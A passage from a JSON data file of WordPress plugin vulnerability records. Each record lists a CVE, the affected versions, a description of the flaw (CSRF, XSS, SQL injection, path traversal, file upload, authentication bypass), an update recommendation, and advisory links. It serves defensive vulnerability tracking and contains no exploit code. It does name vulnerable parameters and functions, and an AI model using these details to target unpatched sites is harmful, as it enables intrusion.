reponame=&new=3084635%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&old=3004433%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&sfp_email=&sfph_mail=#file17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084635%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&old=3004433%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&sfp_email=&sfph_mail=#file17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1446","slug":"social-networks-auto-poster-facebook-twitter-g","versionImpact":"4.4.3","versionEndExcluding":"4.4.4","description":"The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.4.3. This is due to missing or incorrect nonce validation on the nxssnap-reposter page. This makes it possible for unauthenticated attackers to delete arbitrary posts or pages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/306b23ee-7dcb-4281-a218-21168998c4b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/306b23ee-7dcb-4281-a218-21168998c4b9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084635%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&old=3004433%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&sfp_email=&sfph_mail=#file17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084635%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&old=3004433%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&sfp_email=&sfph_mail=#file17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-38519","slug":"mainwp","versionImpact":"4.4.3.3","versionEndExcluding":"4.4.3.4","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MainWP MainWP Dashboard \u2013 WordPress Manager for Multiple Websites Maintenance.This issue affects MainWP Dashboard \u2013 WordPress Manager for Multiple Websites Maintenance: from n\/a through 4.4.3.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mainwp\\\/wordpress-mainwp-plugin-4-4-3-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mainwp\\\/wordpress-mainwp-plugin-4-4-3-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6623","slug":"essential-blocks","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"The Essential Blocks WordPress plugin before 4.4.3 does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/633c28e0-0c9e-4e68-9424-55c32789b41f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/633c28e0-0c9e-4e68-9424-55c32789b41f\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1985","slug":"simple-membership","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"The Simple Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Display Name' parameter in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a6ca886-de4c-4d45-a934-3e90378e7eb3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a6ca886-de4c-4d45-a934-3e90378e7eb3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L103\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L157\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L157\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3045036%40simple-membership%2Ftrunk&old=3021218%40simple-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3045036%40simple-membership%2Ftrunk&old=3021218%40simple-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0062","slug":"ean-for-woocommerce","versionEndExcluding":"4.4.3","description":"The EAN for WooCommerce WordPress plugin before 4.4.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/450f94a3-56b1-41c7-ac29-fbda1dc04794\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/450f94a3-56b1-41c7-ac29-fbda1dc04794\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5791","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wp_id' parameter in all versions up to, and including, 4.4.2 due to missing authorization checks on processAction function, as well as insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute whenever a user accesses a wp-admin dashboard.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c033171a-d81f-4cae-830b-8bdc4017b85e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c033171a-d81f-4cae-830b-8bdc4017b85e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/tags\\\/4.4.2\\\/vcita-api-functions.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/tags\\\/4.4.2\\\/vcita-api-functions.php#L40\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5859","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018d\u2019 parameter in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ea0559-dec7-4c20-956d-dbfe7bc67634?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ea0559-dec7-4c20-956d-dbfe7bc67634?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104980%40meeting-scheduler-by-vcita&new=3104980%40meeting-scheduler-by-vcita&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104980%40meeting-scheduler-by-vcita&new=3104980%40meeting-scheduler-by-vcita&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28172","slug":"wp-google-map-plugin","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in flippercode WordPress Plugin for Google Maps \u2013 WP MAPS (formerly WP Google Map Plugin) plugin <=\u00a04.4.2 versions.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-google-map-plugin\\\/wordpress-wp-maps-plugin-4-4-2-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-google-map-plugin\\\/wordpress-wp-maps-plugin-4-4-2-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37262","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in vCita.Com Online Booking & Scheduling Calendar for WordPress by vcita allows Reflected XSS.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.4.2.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-plugin-4-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-plugin-4-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37499","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vCita Online Booking & Scheduling Calendar for WordPress by vcita allows Path Traversal.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.4.2.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-plugin-4-4-2-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-plugin-4-4-2-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9236","slug":"tlp-team","versionImpact":"4.4.1","versionEndExcluding":"4.4.2","description":"The Team  WordPress plugin before 4.4.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd06ba56-37dd-4c23-ae7c-ab8de40d1645\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd06ba56-37dd-4c23-ae7c-ab8de40d1645\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1666","slug":"cookiebot","versionImpact":"4.4.1","versionEndExcluding":"4.4.2","description":"The Cookie banner plugin for WordPress \u2013 Cookiebot CMP by Usercentrics plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the send_uninstall_survey() function in all versions up to, and including, 4.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit the uninstall survey on behalf of a website.","recommendation":"Update to version 4.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cookiebot\\\/tags\\\/4.4.1\\\/src\\\/lib\\\/Cookiebot_Review.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cookiebot\\\/tags\\\/4.4.1\\\/src\\\/lib\\\/Cookiebot_Review.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251089%40cookiebot&new=3251089%40cookiebot&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251089%40cookiebot&new=3251089%40cookiebot&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2e5fca6-363c-4875-9eb8-44e080d99650?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2e5fca6-363c-4875-9eb8-44e080d99650?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1092","slug":"feedzy-rss-feeds","versionImpact":"4.4.1","versionEndExcluding":"4.4.2","description":"The RSS Aggregator by Feedzy \u2013 Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the feedzy dashboard in all versions up to, and including, 4.4.1. This makes it possible for authenticated attackers, with contributor access or higher, to create, edit or delete feed categories created by them.","recommendation":"Update to version 4.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98053141-fe97-4bd4-b820-b6cca3426109?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98053141-fe97-4bd4-b820-b6cca3426109?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3030538%40feedzy-rss-feeds%2Ftrunk&old=3028200%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3030538%40feedzy-rss-feeds%2Ftrunk&old=3028200%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0957","slug":"print-invoices-packing-slip-labels-for-woocommerce","versionImpact":"4.4.1","versionEndExcluding":"4.4.2","description":"The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Customer Notes field in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected invoice for printing.","recommendation":"Update to version 4.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6828","slug":"redux-framework","versionImpact":"4.4.17","versionEndExcluding":"4.4.18","description":"The Redux Framework plugin for WordPress is vulnerable to unauthenticated JSON file uploads due to missing authorization and capability checks on the Redux_Color_Scheme_Import function in versions 4.4.12 to 4.4.17. This makes it possible for unauthenticated attackers to upload JSON files, which can be used to conduct stored cross-site scripting attacks and, in some rare cases, when the wp_filesystem fails to initialize - to Remote Code Execution.","recommendation":"Update to version 4.4.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18a37063-31aa-4b1f-b1a5-1ea921a20686?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18a37063-31aa-4b1f-b1a5-1ea921a20686?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/core.trac.wordpress.org\\\/browser\\\/tags\\\/6.5.4\\\/src\\\/wp-includes\\\/class-wp-theme-json.php#L1690\",\"name\":\"https:\\\/\\\/core.trac.wordpress.org\\\/browser\\\/tags\\\/6.5.4\\\/src\\\/wp-includes\\\/class-wp-theme-json.php#L1690\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/extensions\\\/color_scheme\\\/color_scheme\\\/class-redux-color-scheme-import.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/extensions\\\/color_scheme\\\/color_scheme\\\/class-redux-color-scheme-import.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/classes\\\/class-redux-helpers.php#L938\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/classes\\\/class-redux-helpers.php#L938\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/fields\\\/typography\\\/redux-typography.js#L646\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/fields\\\/typography\\\/redux-typography.js#L646\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/trunk\\\/redux-core\\\/inc\\\/classes\\\/class-redux-filesystem.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/trunk\\\/redux-core\\\/inc\\\/classes\\\/class-redux-filesystem.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/classes\\\/class-redux-filesystem.php#L614\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redux-framework\\\/tags\\\/4.4.17\\\/redux-core\\\/inc\\\/classes\\\/class-redux-filesystem.php#L614\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1561","slug":"apppresser","versionImpact":"4.4.10","versionEndExcluding":"4.4.11","description":"The AppPresser \u2013 Mobile App Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' parameter in all versions up to, and including, 4.4.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages when logging is enabled that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.10\\\/templates\\\/template.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.10\\\/templates\\\/template.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254632\\\/apppresser\\\/tags\\\/4.4.11\\\/inc\\\/AppPresser_Log_Admin.php?old=3219464&old_path=apppresser%2Ftags%2F4.4.10%2Finc%2FAppPresser_Log_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254632\\\/apppresser\\\/tags\\\/4.4.11\\\/inc\\\/AppPresser_Log_Admin.php?old=3219464&old_path=apppresser%2Ftags%2F4.4.10%2Finc%2FAppPresser_Log_Admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77328e35-b6e6-40eb-8c85-896d54419aef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77328e35-b6e6-40eb-8c85-896d54419aef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10939","slug":"image-widget","versionImpact":"4.4.10","versionEndExcluding":"4.4.11","description":"The Image Widget WordPress plugin before 4.4.11 does not sanitise and escape some of its Image Widget settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcf50077-b360-4b63-bece-9806b4bc8bea\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcf50077-b360-4b63-bece-9806b4bc8bea\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-35761","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.0","versionEndExcluding":"4.4.1","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in vCita Online Booking & Scheduling Calendar for WordPress by vcita allows Stored XSS.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.4.0.","recommendation":"Update to version 4.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7200","slug":"eventon","versionImpact":"4.4.0","versionEndExcluding":"4.4.1","description":"The EventON WordPress plugin before 4.4.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 4.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/586cf0a5-515c-43ea-8c03-f2f47ed13c2c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/586cf0a5-515c-43ea-8c03-f2f47ed13c2c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6141","slug":"essential-real-estate","versionImpact":"4.3.5","versionEndExcluding":"4.4.0","description":"The Essential Real Estate WordPress plugin before 4.4.0 does not apply proper capability checks on its AJAX actions, which among other things, allow attackers with a subscriber account to conduct Stored XSS attacks.","recommendation":"Update to version 4.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df12513b-9664-45be-8824-2924bfddf364\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df12513b-9664-45be-8824-2924bfddf364\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6139","slug":"essential-real-estate","versionImpact":"4.3.5","versionEndExcluding":"4.4.0","description":"The Essential Real Estate WordPress plugin before 4.4.0 does not apply proper capability checks on its AJAX actions, which among other things, allow attackers with a subscriber account to conduct Denial of Service attacks.","recommendation":"Update to version 4.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/96396a22-f523-4c51-8b72-52be266988aa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/96396a22-f523-4c51-8b72-52be266988aa\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4611","slug":"apppresser","versionImpact":"4.3.2","versionEndExcluding":"4.4.0","description":"The AppPresser plugin for WordPress is vulnerable to improper missing encryption exception handling on the 'decrypt_value' and on the 'doCookieAuth' functions in all versions up to, and including, 4.3.2. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they previously used the login via the plugin API. This can only be exploited if the 'openssl' php extension is not loaded on the server.","recommendation":"Update to version 4.4.0, or a newer patched 